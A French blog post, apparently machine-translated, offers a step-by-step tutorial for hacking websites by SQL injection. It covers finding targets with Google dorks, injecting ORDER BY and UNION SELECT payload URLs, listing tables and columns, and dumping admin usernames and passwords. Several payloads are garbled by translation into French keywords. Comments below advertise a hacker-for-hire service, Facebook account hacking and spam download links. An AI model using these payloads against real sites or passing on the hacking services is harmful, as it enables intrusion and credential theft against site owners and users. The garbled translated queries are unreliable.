Hack sites Web en utilisant SQL Injection Avec procédure étape par étape


Injection SQL  attaque avec des étapes faciles et simples. J'ai vu beaucoup de gens de qu'ils ne peuvent pas comprendre  Injection SQL  méthode parce que c'est vraiment très difficile à comprendre et Injecter malveillant  code dans URL et obtenir site  Base de données , donc ici j'ai créé  Injection SQL  tutoriel avec des étapes faciles et compréhensible, espérons que vous l'aimerez .

✔  Quel est l'injection SQL? 
      Injection SQL est un vulneraility l'application Web commune qui permet à un attaquant d'injecter commande SQL malveillant par paramètre ou une boîte d'entrée qui est connecté à la base de données du site.Dans SQL Injection un attaquant trouve (SQLi) vulnerablility et injecter du code malveillant grâce à diverses techniques et Hack la base de données du site c'est ce qu'on appelle une attaque par injection SQL Exploiter DB (base de données), ainsi que la vulnérabilité d'injection SQL exploitation.  utilisant la méthode d'attaque par injection SQL un attaquant peut obtenir complète DB du site - ID utilisateur et mot de passe peut être explosé, un attaquant peut également Arrêtez My SQL Server. Un attaquant peut modifier le contenu de site Web et dérivation connexion.

✔  Exigences: -
Une. Trouver site vulnérable.
      Un attaquant toujours utiliser  Google  Bing  ou  Yahoo  moteur de recherche pour rechercher Injection SQL sites vulnérables en utilisant Dorks. Dorks avec le paramètre URL.


  • Cliquez ici pour télécharger la liste énorme de Dorks par injection SQL
  • Rechercher une quelconque dork sur Google, par exemple pour. m avec  inurl: index.php id =?
  • Fondamentalement, je l'utilise toujours Google pour rechercher des sites vulnérables. et si vous voulez Hack site Web particulier, alors vous devez numériser ou vérifier chaque page, l'URL afin de déterminer si elle est vulnérable ou pas manuellement.

    Cliquez sur l'image pour l'agrandir
Ici, pour tutoriel J'ai déjà un site vulnérable  (Mais je ne peux pas exposer son nom)  En ce résultat, vous trouverez des milliers de sites. la chose commune dans ce résultat de recherche est tout le site URL ayant ce type de code à sa fin  inurl: index.php id = 
Oui , certainement, il aura fait tout ce site ayant SQL paramètre dans leur URL. Donc, tout simplement Google fouillé.



✔  Trouver SQLi vulnérabilités
  • Ouvrez une URL de site Web qui ont SQL paramètre. comme Dorks
  • Mettez Citer unique à la fin de l'URL du site ( ' )
  • Si la page reste la même ou non trouvé, alors il n'est pas vulnérable et si la page n'importe quel type de l'erreur liée à chaîne SQL ou MySQL erreur, puis le site est vulnérable à SQLI. Pour exemple. J'ai eu cette erreur.:

    Une erreur s'est produite ... Vous avez une erreur dans votre syntaxe SQL;? Consultez le manuel qui correspond à votre version du serveur MySQL pour le droit d'utiliser la syntaxe près de'' / contentPage.php id = 8'' 'à la ligne 1


  • Cela signifie que le site est vulnérable à l'injection SQL. * Vive *

✔  Trouver le nombre de colonnes.


  • Yehfii! Nous avons trouvé SQL Injection site vulnérable maintenant il est temps de ne pas trouver. de colonnes présentes dans la base de données.
  • Pour ce faire remplacer qu'un seul apostrophe (') avec "Trier par pas." Déclaration jusqu'à ce que vous trouvez le message d'erreur.  changez le pas. de 1,2,3,4,5,6,7,8,9, ..... Jusqu'à ce que vous obtenez un message d'erreur comme "Unknown column"
  • Par exemple: - Changer c'est Trier par 1,2,3,4 comme ci-dessous Exemple: -


  • Et Supposons dessus de méthode ne fonctionne pas alors utiliser ci-dessous méthode.

Si vous obtenez une erreur sur l'ordre de 9 cela signifie que la DB a 8 nombre de colonnes et Si u ont trouvé d'erreur sur l'ordre de 6 puis la DB ont 5 nombre de colonnes. Je veux dire que si vous mettez l'ordre de 12 et Supposons que la DB ont seulement 11 pas. des colonnes puis Site Web affichera erreur comme ceci:.  Une erreur s'est produite Inconnu colonne '12 'dans «clause de l'ordre».

# Cette astuce est en fait utilisé pour trouver le nombre de colonnes dans le DB. Comprendre l'exemple ci-dessous et vous devrez fournir apprendre à connaître.


www.targetwebsite.com/index.php?id=8 Classement par 1 (pas d'erreur)
www.targetwebsite.com/index.php?id=8 Classement par 2 (pas d'erreur)
www.targetwebsite.com/index.php?id=8 Classement par 3 (pas d'erreur)
www.targetwebsite.com/index.php?id=8 Classement par 4 (pas d'erreur)
www.targetwebsite.com/index.php?id=8 Classement par 5 (pas d'erreur)
www.targetwebsite.com/index.php?id=8 Classement par 6 (erreur)
......................... Essayez Jusqu'à ce que vous obtenez une erreur ................... .......

Voici, mon site vulnérable Montré erreur sur  Classement par 12  ce qui signifie mon site web vulnérables ont 11 nombre de colonnes dans sa base de données.  Donc ici j'ai trouvé nombre de colonnes dans ma DB: - Nombre de colonnes =  11
 

  Trouver la colonne vulnérables.
  • Fondamentalement, si le site est vulnérable alors qu'il possède vulnérabilité dans cette colonne et maintenant il est temps de découvrir cette colonne. Eh bien, nous le nombre de colonnes présentes dans la base de données a découvert avec succès. nous trouvons colonne vulnérables en utilisant la requête "Union Select columns_sequence". Et également modifier l'ID Valeur de négatif, je veux dire Supposons que le site possède cette URL index.php? Id = 8 Changement à index.php id = -8?. Il suffit de mettre le signe moins "-" avant ID.
  • Pour exemple. Si le numéro de la colonne est de 11 alors la requête est la suivante: -

    www.targetwebsite.com/index.php?id=-8 union sélectionner 1,2,3,4,5,6,7,8,9,10,11 -

  • Et Supposons dessus de méthode ne fonctionne pas alors utiliser ci-dessous méthode: -

    www.targetwebsite.com/index.php?id=-8 et 1 = 2 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11 -

  • Et une fois si la requête a été exécutée alors il affichera le numéro de la colonne.

  • Dans le résultat ci-dessus, j'ai trouvé trois colonnes vulnérables 2,3 et 4.  laisser prendre 2 comme notre tutoriel  Eh bien! Nous avons trouvé les colonnes vulnérables, maintenant l'étape suivante.

✔  Trouver la version, la base de données et l'utilisateur.
Maintenant, cette fois nous avons à savoir la version du site Web de base de données, l'utilisateur, Nom de la base et une autre information, Il suffit de remplacer la colonne Vulnérable pas. avec " Version () "

Pour exemple. 
www.targetwebsite.com/index.php?id=-8 union sélectionner 1, la version () ,3,4,5,6,7,8,9,10,11 -

 
Et maintenant Appuyez sur Entrée: et vous aurez raison.


Maintenant encore ne la même remplacer la colonne vulnérables requête différente comme: -  la base de données (), l'utilisateur ()

Pour exemple.
www.targetwebsite.com/index.php?id=-8 union sélectionner 1, la version () ,3,4,5,6,7,8,9,10,11 -
www.targetwebsite.com/index.php?id=-8 union sélectionner 1, base de données () ,3,4,5,6,7,8,9,10,11 -
www.targetwebsite.com/index.php?id=-8 union sélectionner 1, l'utilisateur () ,3,4,5,6,7,8,9,10,11 -


               Et Supposons dessus de méthode ne fonctionne pas alors utiliser ci-dessous méthode 


www.targetwebsite.com/index.php?id=-8 et 1 = 2 UNION SELECT 1, UNHEX (hex (@ @ Version)) , 3,4,5,6,7,8,9,10,11 - -


✔  Trouver le  nom de la table .
  • Ici, nous avons trouvé la colonne vulnérables, nom DB version et l'utilisateur, il est temps d'obtenir le nom de la table. Si la version de base de données est de 4 ou plus alors que vous avez donné à deviner les noms de table  (SQL aveugles d'attaque par injection)
  • Voyons maintenant le nom de table de la base de données, même ici remplacent numéro de colonne vulnérables  "group_concat (nom_table)  et ajoute le  "de INFORMATION_SCHEMA.TABLES où table_schema = base de données () "
 
Pour exemple. 
www.targetwebsite.com/index.php?id=-8 union sélectionner 1, group_concat (table_name) , 3,4,5,6,7,8,9,10,11  de INFORMATION_SCHEMA.TABLES où table_schema = base de données () -


Maintenant appuyez sur Entrée et vous pouvez voir le tableau complet de la base de données.

(Cliquez sur l'image pour l'agrandir)




Grande nous avons trouvé le nom de la table maintenant trouver le nom de la table qui est liée à l'admin ou utilisateur. comme vous pouvez le voir dans l'image ci-dessus il ya un nom de table: -   UserDatabase .Choisissons cette table UserDatabase and Go à l'étape suivante.

✔  Trouver le  nom de la colonne .
  • Maintenant même de trouver des noms de colonne, remplacer  "group_concat (nom_table)  avec "group_concat (nom_colonne)"  et  Remplacer le  de INFORMATION_SCHEMA.TABLES où table_schema = base de données () - "par" DE  information_schema.columns WHERE table_name = mysqlchar -

  • Ne pas frapper Saisissez maintenant, tout d'abord Autre   nom de la table dans  Mysql Char String ()
  • Installer la Hackbar add-on Firefox  Cliquez ici pour télécharger
  • Après l'installation, vous pouvez voir la barre d'outils, et si vous ne pouvez pas alors Hit F9. Sélectionnez sql-> MySQL-> MysqlChar () dans le Hackbar.

  • Entrez le nom de la table que vous voulez convertir dans Mysql Char

  • Maintenant, vous pouvez voir la Charte comme ceci: -
  • Copiez et collez le code à la fin de l'url à la place du "mysqlchar"

Pour exemple.
www.targetwebsite.com/index.php?id = -8 union sélectionner 1, group_concat (column_name), 3,4,5,6,7,8,9,10,11 DE information_schema.columns WHERE table_name = CHAR (117 , 115, 101, 114, 68, 97, 116, 97, 98, 97, 115, 101) -


  • Et maintenant appuyez sur Entrée, vous serez en mesure de voir les noms de colonnes comme ce
(Cliquez sur l'image pour l'agrandir)
  • Grande Ici nous avons trouvé Nom d'utilisateur et mot de passe Colonne: D.

✔  Explorez Base de données  & Hack il .
                     Cool! maintenant vous savez la prochaine étape ce qu'il faut faire: D. .... obtenir l'ID et mot de passe de l'utilisateur administrateur d'utiliser cette commande dans l'URL. Maintenant remplacent   group_concat (nom_colonne)  avec  group_concat ( nom d'utilisateur , 0x2a, mot de passe ).  ou tout autre nom de la colonne que vous voulez obtenir des données.

Pour exemple.
http://targetwebsite.com / index.php? id = -8 et 1 = 2 UNION SELECT 1, group_concat (nom d'utilisateur, 0x2a, mot de passe), 3,4,5,6,7,8,9,10,11 de UserDatabase -


  • Si la commande ci-dessus ne fonctionne pas, utiliser le nom de la colonne de la première et de mettre toutes les colonnes à la fois et vous serez en mesure d'obtenir la base de données complète.

5 commentaires:

  1. wifis a dit…:

    Apprenez à recuperez un compte gratuitement et facilement 982

    Download Software professionnel ▄︻̷̿┻̿═━一 http://geek-bot.com/comment-pirater-un-compte-facebook-gratuitement-sans-offre/

    ▄︻̷̿┻̿═━一 comment pirater un compte facebook 2016

  1. Unknown a dit…:

    To get a higher exposure for your products or personality, being present on social website such as Twitter is essential these days.permanent twitter followers

  1. Robert McCain a dit…:

    Si vous pensez que votre conjoint triche et que vous devez engager un véritable pirate informatique pour surveiller / pirater à distance son téléphone, récupérer votre bitcoin volé / toute autre crypto-monnaie ou pirater une base de données avec une confidentialité garantie, contactez easybinarysolutions@gmail.com ou WhatsApp: +1 3478577580, ils sont efficaces et confidentiels.

  1. Anonyme a dit…:

    Hack Sites Web En Utilisant Sql Injection Avec Procédure Étape Par Étape >>>>> Download Now

    >>>>> Download Full

    Hack Sites Web En Utilisant Sql Injection Avec Procédure Étape Par Étape >>>>> Download LINK

    >>>>> Download Now

    Hack Sites Web En Utilisant Sql Injection Avec Procédure Étape Par Étape >>>>> Download Full

    >>>>> Download LINK

Enregistrer un commentaire

 
Geeks Blog © 2012 | Designed by Cheap TVS, in collaboration with Vegan Breakfast, Royalty Free Images and Live Cricket Score